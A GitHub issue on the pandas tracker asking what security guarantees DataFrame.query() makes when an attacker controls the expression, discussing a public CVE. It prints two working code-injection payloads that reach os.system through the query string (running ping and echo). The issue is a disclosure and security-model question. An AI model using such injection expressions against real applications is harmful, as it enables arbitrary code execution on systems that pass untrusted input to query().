We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
I have searched the [pandas] tag on StackOverflow for similar questions.
I have asked my usage related question on StackOverflow.
https://stackoverflow.com/questions/79304226/should-i-manually-patch-the-pandas-dataframe-query-vulnerability-or-wait-for-a
(To clarify, this question was written by another user.)
Hi, I saw this question on StackOverflow, which is about a public CVE, CVE-2024-9880.
The basic premise of the CVE is that if an attacker controls the expr argument to DataFrame.query(), then arbitrary code execution can be achieved.
expr
The example given in the CVE is
import pandas as pd df = pd.DataFrame({'a': [1, 2, 3], 'b': ['error_details', 'confidential_info', 'normal']}) query = '@pd.core.frame.com.builtins.__import__("os").system("""ping google.com #""")' try: engine = "python" result = df.query(query,local_dict={},engine="python",).index except Exception as e: print(f'Error: {e}')
However, this is not minimal, and a more minimal construction would be
import pandas as pd df = pd.DataFrame() expr = '@pd.compat.os.system("""echo foo""")' result = df.query(expr, engine='python')
(The report also says that engine='python' is required, but both engine='python' and engine='numexpr' worked in my testing.)
engine='python'
engine='numexpr'
My question is about Pandas's security model. What security guarantees does Pandas make about DataFrame.query() with an attacker-controlled expr?
My intuition about this is "none, don't do that," but I'm wondering what the Pandas project thinks.
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Research
I have searched the [pandas] tag on StackOverflow for similar questions.
I have asked my usage related question on StackOverflow.
Link to question on StackOverflow
https://stackoverflow.com/questions/79304226/should-i-manually-patch-the-pandas-dataframe-query-vulnerability-or-wait-for-a
(To clarify, this question was written by another user.)
Question about pandas
Hi, I saw this question on StackOverflow, which is about a public CVE, CVE-2024-9880.
The basic premise of the CVE is that if an attacker controls the
expr
argument to DataFrame.query(), then arbitrary code execution can be achieved.The example given in the CVE is
However, this is not minimal, and a more minimal construction would be
(The report also says that
engine='python'
is required, but bothengine='python'
andengine='numexpr'
worked in my testing.)My question is about Pandas's security model. What security guarantees does Pandas make about DataFrame.query() with an attacker-controlled
expr
?My intuition about this is "none, don't do that," but I'm wondering what the Pandas project thinks.
The text was updated successfully, but these errors were encountered: